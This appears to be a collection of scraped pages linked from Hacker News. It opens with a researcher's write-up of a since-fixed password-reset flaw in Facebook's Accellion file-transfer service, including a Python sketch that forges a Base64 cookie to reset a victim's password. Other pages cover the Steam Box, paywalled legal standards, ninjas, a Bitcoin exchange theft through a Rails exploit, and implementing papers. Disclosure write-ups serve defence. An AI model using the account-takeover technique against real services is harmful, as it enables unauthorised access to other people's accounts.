Channel: Hacker News 100

Nir Goldshlager Web Application Security Blog: How I Hacked Facebook Employees Secure Files Transfer service (http://files.fb.com )


Comments:"Nir Goldshlager Web Application Security Blog: How I Hacked Facebook Employees Secure Files Transfer service (http://files.fb.com )"

URL:http://www.nirgoldshlager.com/2013/01/how-i-hacked-facebook-employees-secure.html



Hi,

I want to share my finding regarding a password reset logic flaw in Facebook's Secure File Transfer service for employees.

Sometimes, when you add a new security measure (such as a secure file transfer product from Accellion), you may unintentionally expose your organization to exactly this kind of risk.

First of all, if you look at https://files.fb.com, you can see that this service belongs to Accellion (http://www.accellion.com/solutions/secure-file-transfer).

Now, to test a password reset logic flaw, we need an account whose password we can reset, right?

It seems Facebook tried to prevent account creation on the Accellion appliance by removing the registration form from the page view.

I discovered that if you know the direct location of the form (/courier/web/1000@/wmReg.html), you can easily bypass that protection and create an account on files.fb.com.

This vulnerability has since been fixed and you can no longer open a new account on files.fb.com.

OK, so now we have a new account on files.fb.com, right? Cool!
The next step was to download the 45-day trial of the Accellion Secure File Sharing service (http://www.accellion.com/trial-demo).

I realized that there are two kinds of Accellion trial versions:

1. Free 45 Day Cloud Hosted Trial (5 users)

2. Free 45 Day Virtual Trial (5 users)

So I chose the VM (virtual) trial, just to get all the files and source code of the Accellion application.

The bad news was that the VM trial has a protection mechanism, so you cannot access the files through the VM itself.

You can bypass it, however, by mounting the virtual drive in a second Linux machine.
This made it possible to get all the file names and folders in Accellion Secure File Transfer.

Accellion encrypts its PHP source files using the ionCube PHP Encoder (http://www.ioncube.com/sa_encoder.php).

Some older versions of ionCube allow these "encrypted" files to be decrypted.

Bad news again: this version of ionCube was not vulnerable to decryption. I was disappointed, because if I had the source, I had the core.

That could have helped me find more cool issues such as command execution, local file inclusion, etc.

Anyway, I dropped this subject and kept my research going.

I found an interesting file called wmPassupdate.html.

This file is used for password recovery in Accellion Secure File Transfer.

I noticed that there is an extra parameter in the cookie when you try to recover your password via wmPassupdate.html.

This parameter is called referer, and I found that its value is Base64 encoded. Wtf? I didn't think Base64 (as "encryption") was still alive these days. Yes, it appears so :)

So I decoded the Base64 value, and the decoded data turned out to be my own email address ("dbeckyxx@gmail.com"). Cool! I started deleting all the "junk", unneeded cookie parameters and kept only the referer parameter.

I Base64-encoded a different email address belonging to my test account on files.fb.com, and copied it into the referer cookie parameter.

Then I changed the email address parameter in my POST request to the victim's email account, and changed pass1 and pass2 to my chosen password.
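To make the flow concrete, here is a minimal sketch in Python of the forged password-reset request as described above. The cookie name (referer) and form fields (email, pass1, pass2) come from the write-up; the exact endpoint path, the remaining field layout, and the use of the requests library are my own assumptions, not a capture of the real traffic.

import base64
import requests  # assumed HTTP client, only for illustration

# Hypothetical reconstruction of the password-reset request described above.
RESET_URL = "https://files.fb.com/courier/web/1000@/wmPassupdate.html"  # assumed path

victim_email = "victim@example.com"

# The "referer" cookie is nothing more than the Base64 of the account's email,
# so it can be forged for any address we choose.
forged_referer = base64.b64encode(victim_email.encode()).decode()

response = requests.post(
    RESET_URL,
    cookies={"referer": forged_referer},   # all other "junk" cookies removed
    data={
        "email": victim_email,             # account whose password gets reset
        "pass1": "AttackerChosenPass1",    # new password
        "pass2": "AttackerChosenPass1",    # confirmation
    },
)
print(response.status_code)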

And it worked.

PoC Image:


PoC Video:

Facebook and Accellion fixed these issues. I also reported 20+ different bugs in the Accellion Secure File Transfer service, and they fixed all of them :)

Soon I will publish an OAuth bypass in Facebook.com. Cya next time!


BBC News - Can filming one second of every day change your life?

It Begins: Valve And Xi3 Team For ‘Piston’ Steam Box | Rock, Paper, Shotgun


Comments:"It Begins: Valve And Xi3 Team For ‘Piston’ Steam Box | Rock, Paper, Shotgun"

URL:http://www.rockpapershotgun.com/2013/01/08/it-begins-valve-and-xi3-team-for-steam-box/


By Nathan Grayson on January 8th, 2013 at 9:00 am.

Hey everyone, you’re never going to believe this. The Steam Box? It’s totally real. I know, right? I mean, a series of totally unsubstantiated rumors from Valve alphabeard Gabe Newell was dubious at best, and Big Picture mode spent so much time in development for no reason whatsoever. But somehow – completely unexpectedly – we’re now here, watching Valve and mini-PC maker Xi3 team up to reveal “an integrated system that exceeds the capabilities of leading game consoles, but can fit in the palm of your hand.” Xi3 also compared the device’s physical size to that of a grapefruit, meaning that this is yet another mind-blowing technological advancement I’ll have to worry about accidentally eating.

Beyond those (subject to change) physical specs and full Steam integration, details are depressingly scarce at the moment. Fortunately, an in-development version of the magical space grapefruit will be squirting its Valve-flavored juices into show-goers’ eyes at CES this week, so hopefully we’ll have more specifics soon. Until then, though, here’s Xi3 being really pleased with themselves.

“Today marks the beginning of a new era for Xi3,” said Jason A. Sullivan, founder, President and CEO of Xi3. “This new development stage product will allow users to take full-advantage of their large high-definition TV displays for an amazing computer game experience. As a result, this new system could provide access to thousands of gaming titles through an integrated system that exceeds the capabilities of leading game consoles, but can fit in the palm of your hand.”

It’s also worth noting that Valve has made a full-blown investment in Xi3, so this isn’t just some throwaway third-party project. Or at least, it certainly doesn’t seem that way. Meanwhile, a Linux-powered Steam box was allegedly revealed in Germany yesterday, but there’s no telling if the two are one and the same.

So then, the plot thickens, and CES continues to be a treasure trove of interesting (if not necessarily glamorous) windows into the future of PC gaming. The most obvious message here? There are a lot of powerful people attempting to push PC gaming into the living room. Will it work? Will it become the new standard? And, if so, how will the change of scenery affect the focus of the games people choose to develop for our most marvellous of mother platforms? Seems like we’ll get answers to these questions sooner rather than later. Personally, so long as I get to keep my thriving mod and indie scenes, I’m fine with playing anywhere – office, bedroom, living room, in a box, with a fox, whatever.

Actually, that brings us to the rather interesting question of what defines PC gaming as a whole and whether or not this type of thing presents a threat to that essence. So I’m curious: what specific thing(s) makes PC gaming for you, and are you worried that wading into “enemy” (read: console) territory could extinguish that?

Liberating America's secret, for-pay laws - Boing Boing


Comments:"Liberating America's secret, for-pay laws - Boing Boing"

URL:http://boingboing.net/2012/03/19/liberating-americas-secret.html


[Editor's note: This morning, I found an enormous, 30 lb box waiting for me at my post-office box. Affixed to it was a sticker warning me that by accepting this box into my possession, I was making myself liable for nearly $11 million in damages. The box was full of paper, and printed on the paper were US laws -- laws that no one is allowed to publish or distribute without permission. Carl Malamud, Boing Boing's favorite rogue archivist, is the guy who sent me this glorious box of weird (here are the unboxing pics for your pleasure). I was expecting it, because he asked me in advance if I minded being one of the 25 entities who'd receive this law-bomb on deposit. I was only too glad to accept -- on the condition that Carl write us a guest editorial explaining what this was all about. He was true to his word. -Cory]

Boing Boing Official Guest Memorandum of Law

To: The Standards People
Cc: The Rest of Us People
From: Carl Malamud, Public.Resource.Org
In Re: Our Right to Replicate the Law Without a License

I. “Code Is Law”—Lessig

Did you know that vital parts of the US law are secret, and you're only allowed to read them if you pay a standards body thousands of dollars for the right to find out what the law of the land is?

Public.Resource.Org spent $7,414.26 buying privately-produced technical public safety standards that have been incorporated into U.S. federal law. These public safety standards govern and protect a wide range of activity, from how bicycle helmets are constructed to how to test for lead in water to the safety characteristics of hearing aids and protective footwear. We have started copying those 73 standards despite the fact that they are festooned with copyright warnings, shrinkwrap agreements, and other dire warnings. The reason we are making those copies is that citizens have the right to read and speak the laws that we are required to obey and that are critical to the public safety.

When Peter Veeck posted the Building Code of Savoy, Texas on the Web, the standards people came after him with a legal baseball bat. The standards people run private nonprofit organizations that draft model laws that states then adopt as law, through a mechanism known as incorporation by reference.

Peter thought the people of his town should be able to read the law that governed them. But the standards people were adamant that the model building codes were their copyright-protected property and that nobody could post this information without a license, nobody could copy their property without paying the tollmaster.

The U.S. Court of Appeals disagreed, saying that there is a “continuous understanding that ‘the law,’ whether articulated in judicial opinions or legislative acts or ordinances, is in the public domain and thus not amenable to copyright.” Veeck v. Southern Building Code Congress, 293 F.3d 791 (5th Circuit, 2002).

II. “If a Law Isn't Public, It Isn't a Law”—Justice Stephen Breyer

Based on the Veeck decision—and a long line of other court opinions that steadfastly maintain that public access to the text of the laws that govern us is a fundamental aspect of our democratic system—Public.Resource.Org has been posting the building, fire, plumbing, and other state public safety codes since 2007. For the last two years, we've taken the public safety codes of California and converted them to HTML. A group of students in the RDC rural mentoring program have converted the formulas and graphics to SVG and MathML, and we put the whole thing into an open code repository.

However, the building, fire, and plumbing codes are just a subset of the technical standards that have become law. Despite the 2002 Veeck decision, standards incorporated by reference continue to be sold for big bucks. Big bucks as in $65 for a 2-page standard from the Society of Automotive Engineers, required as part of the Federal Motor Vehicle Safety Standards in 49 CFR § 571. Big bucks as in $847 for a 48-page 1968 standard from Underwriters' Laboratories required as part of the OSHA workplace safety standards in 29 CFR § 1910.

Public.Resource.Org has a mission of making the law available to all citizens, and these technical standards are a big black hole in the legal universe. We've taken a gamble and spent $7,414.26 to buy 73 of these technical public safety standards that are incorporated into the U.S. Code of Federal Regulations. We made 25 print copies of each of these standards and bound each document in a red/white/blue patriotic Certificate of Incorporation stating that the documents are legally binding on citizens and residents of the United States and that "criminal penalties may apply for noncompliance!"

III. Our $273.7 Million Gamble on Print

Why print copies you may ask? Frankly, because we're scared and wanted to take a cautious and prudent first step in duplicating these legal documents. With a print edition, we are able to limit distribution with none of those infinite-copy side effects we know and love about our digital world. Print seemed to be a medium the standards people and the legal people could relate to.

We know from all the copyright warnings, terms of use, scary shrink wrap agreements, and other red-hot rhetoric that accompany these documents that the producers continue to believe that copies may not be made under any circumstances. Those of you familiar with copyright math know that statutory damages for unlawful replication of a document are $150,000 per infraction. So, even though we strongly believe that the documents are not entitled to copyright protection, and moreover that our limited print run is in any case definitely fair use, if a judge were to decide that what we did was breaking the law, 25 copies of 73 standards works out to $273,750,000 in potential liability. While whales may make bigger bets, we draw the line at $273 million.

Those copies were bound up in 27.9-pound boxed sets and dispatched to 3 classes of recipients:

Upon the close of the May 1 comment period, it is our intention to begin posting these 73 standards in HTML and begin the process of providing a unified, easy-to-use interface to all public safety standards in the Code of Federal Regulations. It is also our intention to continue this effort to include all standards specifically incorporated by reference in the 50 states. That the law must be available to citizens is a cardinal principle of law in countries such as India and the United Kingdom, and we will expand our efforts to include those jurisdictions as well.

IV. A Poll Tax on Access to Justice

The argument for the status quo is that it costs money to develop these high-quality standards and that it is the stated public policy of government that these standards shall be developed by the private sector using a voluntary, consensus-based approach. (Having spent a lot of time with these documents, we can vouch that many of these standards are very high-quality technical documents. This is important stuff and groups like ASME and NFPA do a great job.)

All nonprofits need money and SDOs are no exception. But, no matter how you slice the cheese, you can't do this on the backs of the informed citizenry. Access to the law is a fundamental legal right.

Do these organizations need the revenue from standards sales in order to keep making high-quality standards? While SDOs have come to rely on this very lucrative monopoly over pieces of the public domain, a look at their revenue streams and executive compensation levels indicates that perhaps they don't need quite as much as they're getting. They all have a variety of revenue streams in addition to document sales ranging from membership fees to conferences to training and directed research (often done with grants, subsidies, or direct support from government). As 501(c)(3) nonprofits with an explicit goal of making their standards into law, SDOs have moral and legal obligations to make those standards that have already become law available to the public and in no case can they prohibit others from doing so.

The scale of these operations is indicated in Table 1, which lists the CEO compensation for ten leading standards-making nonprofits. (ISO refuses to divulge executive compensation despite their status as a nongovernmental organization based in Switzerland.)

Table 1: Compensation of Major Nonprofits Involved in Standards Setting

Rank  Name of Nonprofit Organization             Name of Leader       Year  Amount
1.    Underwriters' Laboratories                 K. Williams          2009  $2,075,984
2.    National Sanitation Foundation             Kevin Lawlor         2009  $1,140,012
3.    British Standards Institution              Howard Kerr          2010  $1,029,161
4.    National Fire Protection Association       James M. Shannon     2009  $926,174
5.    American National Standards Institute      Saranjit Bhatia      2010  $916,107
6.    ASTM International                         James A. Thomas      2009  $782,047
7.    IEEE                                       James Prendergast    2009  $422,412
8.    Society of Automotive Engineers            David L. Schutt      2009  $422,128
9.    American Society of Mechanical Engineers   Thomas G. Loughlin   2009  $420,960
10.   The United States of America               Barack Obama         2011  $400,000

The status quo assumes that the only way to fund a standards-making process is to charge lots of money for the end product. But that is a self-serving self-delusion. The SDOs would actually grow and prosper in an open environment, and they would certainly carry out their mission more effectively. They might need to change their business models, but hasn't the Internet made the rest of us change our business models?

V. “Let Every Sluice of Knowledge Be Set A-Flowing”—John Adams

The Internet was built on open standards that are freely available. Many readers may not realize it, but there were originally two Internets. The one we use is based on TCP/IP and was developed by the IETF and other groups such as the W3C. But, there was another Internet called Open Systems Interconnection (OSI) which was being pushed in the 1980s and early 1990s by the International Organization for Standardization (ISO) and other SDOs. The OSI Internet was based on very expensive standards and it failed miserably. It was open that won and open that scaled.

It is our contention that the physical standards that we're posting are just as important as Internet standards. By making things like the National Fuel and Gas Code, the standard for safety in wood and metal ladders, or the standards for safety and hygiene in water supplies readily available to all without restriction, we make society better. People can read the standards and learn, they can improve upon them by making searchable databases or better navigational tools, they can build new kinds of businesses.

Innovation and education are just two of the benefits of opening up this world, but at the root are basic issues of democracy and justice. We cannot tell citizens to obey laws that are only available for the rich to read. The current system acts as a poll tax on access to justice, a deliberate rationing and restriction of information critical to our public safety. That system is morally wrong and it is legally unconstitutional.

VI. Supporting Materials

  • In response to a petition drafted by Professor Strauss of Columbia Law School, the Office of the Federal Register is taking comments from the public as to whether they should provide greater public access to standards incorporated by reference. You have until March 28 to respond. Please let them know what you think!
  • The Administrative Conference of the United States recently considered the issue of Incorporation by Reference, but ended up not taking any significant action. A particularly strong letter of protest was submitted by EFF.
  • For makers and doers interested in the craft of public printing, we posted photographs of the construction of these boxes in our print factory.
  • A copy of the packing slip that was in the boxes, including the Notice Of Incorporation, the shipping manifest, and the 7 letters of transmittal to government officials is available for your review as a PDF file as is a sample Certificate Of Incorporation.

Jacques Fuentes - A letter to my daughter, Augusta, in Ruby


Comments:"Jacques Fuentes - A letter to my daughter, Augusta, in Ruby"

URL:http://jpfuentes2.tumblr.com/post/39935683274/a-letter-to-my-daughter-augusta-in-ruby


I wanted to creatively express my affection for my daughter, Augusta, in a way I know best. I chose Ruby for its flexibility and elegance. My hope is to introduce her to its boundless beauty someday soon using this composition.

This is a real, working program which outputs “Augusta, we <3 you!” when executed. Be sure to read the love.rb file, which supports the letter’s syntax. I tried to keep it symmetrical and legible so that the source closely resembles the content.

View the source on github.

BBC News - Japan's ninjas heading for extinction


Comments:"BBC News - Japan's ninjas heading for extinction"

URL:http://www.bbc.co.uk/news/magazine-20135674


22 November 2012 | Last updated at 20:59 ET | By Mariko Oi, BBC News, Japan
Tools of a dying art

Japan's era of shoguns and samurai is long over, but the country does have one, or maybe two, surviving ninjas. Experts in the dark arts of espionage and silent assassination, ninjas passed skills from father to son - but today's say they will be the last.

Japan's ninjas were all about mystery. Hired by noble samurai warriors to spy, sabotage and kill, their dark outfits usually covered everything but their eyes, leaving them virtually invisible in shadow - until they struck.

Using weapons such as shuriken, a sharpened star-shaped projectile, and the fukiya blowpipe, they were silent but deadly.

Ninjas were also famed swordsmen. They used their weapons not just to kill but to help them climb stone walls, to sneak into a castle or observe their enemies.

Most of their missions were secret so there are very few official documents detailing their activities. Their tools and methods were passed down for generations by word of mouth.

This has allowed filmmakers, novelists and comic artists to use their wild imagination.

Hollywood movies such as Enter the Ninja and American Ninja portray them as superhumans who could run on water or disappear in the blink of an eye.

"That is impossible because no matter how much you train, ninjas were people," laughs Jinichi Kawakami, Japan's last ninja grandmaster, according to the Iga-ryu ninja museum.


Five nearly-true ninja myths

  • Ninjutsu is a martial art: In fact, fighting was a last resort - ninjas were skilled in espionage and defeating foes using intelligence, while swinging a sword was deemed a lower art
  • Ninjas could disappear: They couldn't vanish as they do in the movies, but being skilled with explosives, they could make smoke bombs to momentarily misdirect the gaze, then flit away
  • They wore black: Ninja clothing was made to be light and hard to see in the dark - but jet-black would cause the form to stand out in moonlight, so a dark navy blue dye was usually used
  • Ninjas could fly: They moved quietly and swiftly, thanks to breathing techniques which increased oxygen intake, but kept their feet on the ground
  • And walk on water: CIA intelligence says they used "water shoes" - circular wooden boards or buckets - and a bamboo paddle for propulsion, but doubt remains over their effectiveness

Source: Iga-Ryu Ninja Museum

However, ninjas did apparently have floats that enabled them to move across water in a standing position.

Kawakami is the 21st head of the Ban family, one of 53 that made up the Koka ninja clan. He started learning ninjutsu (ninja techniques) when he was six, from his master, Masazo Ishida.

"I thought we were just playing and didn't think I was learning ninjutsu," he says.

"I even wondered if he was training me to be a thief because he taught me how to walk quietly and how to break into a house."

Other skills that he mastered include making explosives and mixing medicines.

"I can still mix some herbs to create poison which doesn't necessarily kill but can make one believe that they have a contagious disease," he says.

Kawakami inherited the clan's ancient scrolls when he was 18.

While it was common for these skills to be passed down from father to son, many young men were also adopted into the ninja clans.

There were at least 49 of these but Mr Kawakami's Koka clan and the neighbouring Iga clan remain two of the most famous thanks to their work for powerful feudal lords such as Ieyasu Tokugawa - who united Japan after centuries of civil wars when he won the Battle of Sekigahara in 1600.

It is during the Tokugawa era - known as Edo - when official documents make brief references to ninjas' activities.

"They weren't just killers like some people believe from the movies," says Kawakami.

In fact, they had day jobs. "Because you cannot make a living being a ninja," he laughs.


Kawakami demonstrates ninja techniques

There are many theories about these day jobs. Some ninjas are believed to have been farmers, and others pedlars who used their day jobs to spy.

"We believe some became samurai during the Edo period," says Kawakami. "They had to be categorised under the four caste classes set by the Tokugawa government: warrior, farmers, artisan and merchants."

As for the 21st Century ninja, Kawakami is a trained engineer. In his suit, he looks like any other Japanese businessman.

The title of "Japan's last ninja", however, may not be his alone. Eighty-year-old Masaaki Hatsumi says he is the leader of another surviving ninja clan - the Togakure clan.

Hatsumi is the founder of an international martial arts organisation called Bujinkan, with more than 300,000 trainees worldwide.

"They include military and police personnel abroad," he tells me at one of his training halls, known as dojo, in the town of Noda in Chiba prefecture.

It is a small town and not a place you would expect to see many foreigners. But the dojo, big enough for 48 tatami mats, is full of trainees who are glued to every move that Hatsumi makes. His actions are not big, occasionally with some weapons, but mainly barehanded.

Hatsumi explains to his pupils how those small moves can be used to take enemies out.

Paul Harper from the UK is one of many dedicated followers. For a quarter of a century, he has been coming to Hatsumi for a few weeks of lessons every year.

"Back in the early 80s, there were various martial art magazines and I was studying Karate at the time and I came across some articles about Bujinkan," he says.

"This looked much more complex and a complete form of martial arts where all facets were covered so I wanted to expand my experience."

Harper says his master's ninja heritage interested him at the start but "when you come to understand how the training and techniques of Bujinkan work, the ninja heritage became much less important".

Hatsumi's reputation doesn't stop there. He has contributed to countless films as a martial arts adviser, including the James Bond film You Only Live Twice, and continues to practise ninja techniques.

Both Kawakami and Hatsumi are united on one point. Neither will appoint anyone to take over as the next ninja grandmaster.

"In the age of civil wars or during the Edo period, ninjas' abilities to spy and kill, or mix medicine may have been useful," Kawakami says.

"But we now have guns, the internet and much better medicines, so the art of ninjutsu has no place in the modern age."

As a result, he has decided not to take a protege. He simply teaches ninja history part-time at Mie University.

Despite having so many pupils, Mr Hatsumi, too, has decided not to select an heir.

"My students will continue to practice some of the techniques that were used by ninjas, but [a person] must be destined to succeed the clan." There is no such person, he says.

The ninjas will not be forgotten. But the once-feared secret assassins are now remembered chiefly through fictional characters in cartoons, movies and computer games, or as tourist attractions.

The museum in the city of Iga welcomes visitors from across the world, and a trained group called Ashura entertains them with an hourly performance of ninja tricks.

Unlike the silent art of ninjutsu, the shows that school children and foreign visitors watch today are loud and exciting. The mystery has gone even before the last ninja has died.

You can follow the Magazine on Twitter and on Facebook

Mariko Oi's radio report on the last ninja can be heard on the BBC World Service's Outlook programme. Download the Outlook podcast here.

I want the world to scroll this way.

rubytune — rails performance tuning, emergency troubleshooting, server and ops consulting


Comments:"rubytune — rails performance tuning, emergency troubleshooting, server and ops consulting"

URL:http://rubytune.com/cheat



Process Basics

All processes, with params + hierarchy

Show all ruby-related PIDs and processes

What is a process doing?

What files does a process have open?
(also nice to detect ruby version of a process)

Flavors of kill

Keep an eye on a process

Memory

How much mem is free?
Learn how to read output

List the top 10 memory hogs

Detect OOM and other bad things

Disable OOM killer for a process

Disk/Files

Check reads/writes per disk

Files (often logs) marked for deletion but not yet deleted

Overview of all disks

Usage of this dir and all subdirs

Find files over 100MB

Low hanging fruit for free space.
Check /var/log too!

Find files created within the last 7 days

Find files older than 14 days

Delete files older than 14 days

Monitor a log file for an IP or anything else

Generate a large file (count * bs = total bytes)

Network

TCP sockets in use

Get IP/Ethernet info

host IP resolution

Curl, display headers (I), follow redirects (L)

Traceroute with stats over time (top for traceroute). Requires install.

Traceroute using TCP to avoid ICMP blockage

List any IP blocks/rules

Drop any network requests from IP

Show traffic by port

Show all ports listening with process PID

D/L speed test (don't run in prod! :)

Terminal & Screen

Start a screen session as the current user

Join/re-attach to a screen session

Record a terminal session

Playback a recorded terminal session

Tips n Tricks

Run Previous command as root

Change to last working dir

Run something forever

Databases

"Tail" all queries hitting mysql.Learn more
Connect to production mysql locally on port 3307 via sshLearn More

VIRCUREX !!! IMPORTANT !!!


Comments:"VIRCUREX !!! IMPORTANT !!!"

URL:https://bitcointalk.org/index.php?topic=135919.0


Kumala
Sr. Member

Online

Posts: 274

Ignore

Today at 12:19:25 PM

 #1
We sadly need to announce that our wallet has been compromised, so DO NOT send any further funds to any of the coin wallets (BTC, DVC, LTC, etc.). We will set up a new wallet and reset all the addresses. This will most likely take the whole weekend.
Logged
Exchange: https://vircurex.com BTC, LTC,DVC Stockexchange: http://www.cryptostocks.com
DVC 6/49 Lottery: https://dvc-lotto.com BTC 6/49 Lottery: https://btc-lotto.com
Earn money browsing the Internet: http://www.profitclicking.com/?r=rwrehp4reyg
Advertisement: No Excuses; no Exchanges; just Fast payouts. FastCash4Bitcoins
stan.distortion
Hero Member

Offline

Posts: 881

Ignore

Today at 12:31:16 PM

 #2

Ouch, good luck with it. Bitcoin central's down too, looks like someone's being a pain in the ass.

Logged

julz: "Susanne Posel's unwitting work in shepherding the dumbest of the dumb away from Bitcoin is a great benefit to the community, for which we should all be grateful."

John (johnthedong)
Global Janitor and
Global Moderator
Hero Member

Offline

Posts: 3173

Ignore

Today at 01:06:40 PM

 #3

Posted an announcement regarding this at Important Announcements subforum.

Logged
My BTC Tip Jar: 1NB1KFnFqnP3WSDZQrWV3pfmph5fWRyadz
My GPG key ID: B3AAEEB0 My OTC ID: johnthedong
Free escrow service available - tips appreciated! (PM Me)
Endgame
Full Member

Offline

Posts: 205

Ignore

Today at 01:25:49 PM

 #4

Sorry to hear that. How bad is the loss? Will users be out of pocket, or can vircurex cover it?

Logged
Kumala
Sr. Member

Online

Posts: 274

Ignore

Today at 01:58:50 PM

 #5
Further update: The system was not breached and no passwords were compromised (they are salted and hashed multiple times anyway). The attacker used a Ruby on Rails vulnerability that was released yesterday (http://www.exploit-db.com/exploits/24019/) to withdraw the funds.
Logged
Exchange: https://vircurex.com BTC, LTC,DVC Stockexchange: http://www.cryptostocks.com
DVC 6/49 Lottery: https://dvc-lotto.com BTC 6/49 Lottery: https://btc-lotto.com
Earn money browsing the Internet: http://www.profitclicking.com/?r=rwrehp4reyg
ripper234
Hero Member

Offline

Posts: 1140


Ron Gross

Ignore

Today at 03:06:08 PM

 #6
Further update: The system was not breached and no passwords were compromised (they are salted and hashed multiple times anyway). The attacker used a Ruby on Rails vulnerability that was released yesterday (http://www.exploit-db.com/exploits/24019/) to withdraw the funds.

Sorry for your loss.

Amm... the RoR vulnerability was posted to multiple large forums, including Slashdot.

Did the attacker see the announcement before you realized it affected you and could shut off your systems? How come you missed it for so long that you didn't shut your stuff off / upgrade in time?

Logged
- Blog
- About
- BTCtoX.org - translate between BTC and any other currency.
thebaron
Sr. Member

Offline

Posts: 460


wat

Ignore

Today at 03:10:11 PM

 #7

Exploit released yesterday, eh? How convenient...

Logged
I run http://mail-to-jail.com. I am "thebaron-btc" on Bitcoin-OTC.
Kumala
Sr. Member

Online

Posts: 274

Ignore

Today at 03:14:21 PM

 #8

Before the wild speculation begins: the service will be recovered and we will pay the losses out of our own pockets.

Logged
Exchange: https://vircurex.com BTC, LTC,DVC Stockexchange: http://www.cryptostocks.com
DVC 6/49 Lottery: https://dvc-lotto.com BTC 6/49 Lottery: https://btc-lotto.com
Earn money browsing the Internet: http://www.profitclicking.com/?r=rwrehp4reyg
davout
Staff
Hero Member

Offline

Posts: 2493


1davout

Ignore

Today at 03:36:07 PM

 #9

Ouch, good luck with it. Bitcoin central's down too, looks like someone's being a pain in the ass.

That's just scheduled maintenance
We deployed the fixes within five minutes after receiving the notification from the Rails security mailing list.
Logged
Buy and sell EUR at Bitcoin-Central.net.
Also check-out Instawallet and Instawire, don't need to sign-up to anything!
-- The problem with the French, is that they don't even have a word for entrepreneur
davout
Staff
Hero Member

Offline

Posts: 2493


1davout

Ignore

Today at 03:36:52 PM

 #10

Exploit released yesterday, eh? How convenient...

It's the truth.
Logged
Buy and sell EUR at Bitcoin-Central.net.
Also check-out Instawallet and Instawire, don't need to sign-up to anything!
-- The problem with the French, is that they don't even have a word for entrepreneur
makomk
Hero Member

Online

Posts: 890

Ignore

Today at 03:40:53 PM

 #11

Exploit released yesterday, eh? How convenient...

Bit slow of the attacker. I was actually half-expecting someone to start hacking Bitcoin sites before any exploit was even publicly released.
Logged
Quad XC6SLX150 Board: 860 MHash/s or so.
SIGS ABOUT BUTTERFLY LABS ARE PAID ADS
Kumala
Sr. Member

Online

Posts: 274

Ignore

Today at 05:05:41 PM

 #12
Service restored: deposits, trading and withdrawals are working again

For the time being, some restrictions apply until we have sorted out the account details and validated data integrity.

Currency  Trading  Deposits  Withdrawals
BTC       Active   Active    On hold
NMC       Active   Active    On hold
LTC       Active   Active    On hold
DVC       Active   Active    Active
SC        Active   Active    On hold
IXC       Active   Active    Active
PPC       Active   Active    Active
USD       Active   Active    Active
EUR       Active   Active    Active
Logged
Exchange: https://vircurex.com BTC, LTC,DVC Stockexchange: http://www.cryptostocks.com
DVC 6/49 Lottery: https://dvc-lotto.com BTC 6/49 Lottery: https://btc-lotto.com
Earn money browsing the Internet: http://www.profitclicking.com/?r=rwrehp4reyg
Atruk
Jr. Member

Online

Posts: 61

Ignore

Today at 05:21:42 PM

 #13
Service restored: deposits, trading and withdrawals are working again

For the time being, some restrictions apply until we have sorted out the account details and validated data integrity.

Currency  Trading  Deposits  Withdrawals
BTC       Active   Active    On hold
NMC       Active   Active    On hold
LTC       Active   Active    On hold
DVC       Active   Active    Active
SC        Active   Active    On hold
IXC       Active   Active    Active
PPC       Active   Active    Active
USD       Active   Active    Active
EUR       Active   Active    Active


It's good to see you are recovering so quickly, especially with the severe downtime or outright collapse most exchanges seem to go through.
Logged

1H8Ep63MQ1BPF8uoDUpz2KFhTAzYKqaUE5

davout
Staff
Hero Member

Offline

Posts: 2493


1davout

Ignore

Today at 05:24:34 PM

 #14

Service restored: deposits, trading and withdrawals are working again


Did you switch servers ?
Logged
Buy and sell EUR at Bitcoin-Central.net.
Also check-out Instawallet and Instawire, don't need to sign-up to anything!
-- The problem with the French, is that they don't even have a word for entrepreneur
Kumala
Sr. Member

Online

Posts: 274

Ignore

Today at 05:58:42 PM

 #15
It's been a couple of stressful hours here.

No, we did not switch servers. We:
 - applied the Ruby on Rails patch
 - backed up all log files for further analysis
 - reviewed the log files, which show the XML code injection; we validated all triggered commands to ensure nothing other than withdrawing funds (e.g. planting a backdoor) was done.

It's 2 AM here and I need to catch some sleep; mistakes are easily made when you are too tired.

Logged
Exchange: https://vircurex.com BTC, LTC,DVC Stockexchange: http://www.cryptostocks.com
DVC 6/49 Lottery: https://dvc-lotto.com BTC 6/49 Lottery: https://btc-lotto.com
Earn money browsing the Internet: http://www.profitclicking.com/?r=rwrehp4reyg
mc_lovin
Hero Member

Offline

Posts: 1835


www.bitcointrading.com

Ignore

Today at 06:38:45 PM

 #16
Total value lost in the heist?

Sorry for your loss indeed.  Sucks that the vulnerability was in rails and not in your app. 

Logged
kiba
Hero Member

Online

Posts: 5580

Ignore

Today at 07:28:24 PM

 #17

Did you hold ALL your money in cold wallets?

Logged
honest bob
Hero Member

Offline

Posts: 1177

Ignore

Today at 08:32:53 PM

 #18

I'm not sure if I feel worse for bitcoin, vicurex, the people with funds there, or ruby on rails.

Logged
TorGuard VPN: Don't get caught using Bittorrent! Spend your bitcoins on a topnotch VPN/Proxy service! I'm renewing my subscription again later this year.

How to implement an algorithm from a scientific paper | Code Capsule


Comments:"How to implement an algorithm from a scientific paper | Code Capsule"

URL:http://codecapsule.com/2012/01/18/how-to-implement-a-paper/


This article is a short guide to implementing an algorithm from a scientific paper. I have implemented many complex algorithms from books and scientific publications, and this article sums up what I have learned while searching, reading, coding and debugging. This is obviously limited to publications in domains related to the field of Computer Science. Nevertheless, you should be able to apply the guidelines and good practices presented below to any kind of paper or implementation.

1 – Before you jump in

There are a few points you should review before you jump into reading a technical paper and implementing it. Make sure you cover them carefully each time you are about to start working on such a project.

1.1 – Find an open source implementation to avoid coding it

Unless you want to implement the paper for the purpose of learning more about the field, you have no need to implement it. Indeed, what you want is not coding the paper, but just the code that implements the paper. So before you start anything, you should spend a couple of days trying to find an open source implementation on the internet. Just think about it: would you rather lose two days looking for the code, or waste two months implementing an algorithm that was already available?

1.2 – Find simpler ways to achieve your goal

Ask yourself what you are trying to do, and whether simpler solutions would work for what you need. Could you use another technique – even if the result is only 80% of what you want – that does not require implementing the paper, and that you could get running within the next two days or so with available open source libraries? For more on this, see my article The 20 / 80 Productivity Rule.

1.3 – Beware of software patents

If you are in the U.S., beware of software patents. Some papers are patented and you could get into trouble for using them in commercial applications.

1.4 – Learn more about the field of the paper

If you are reading a paper about the use of Support Vector Machines (SVM) in the context of Computational Neuroscience, then you should read a short introduction to Machine Learning and the different types of classifiers that could be alternatives to SVM, and you should as well read general articles about Computational Neuroscience to know what is being done in research right now.

1.5 – Stay motivated

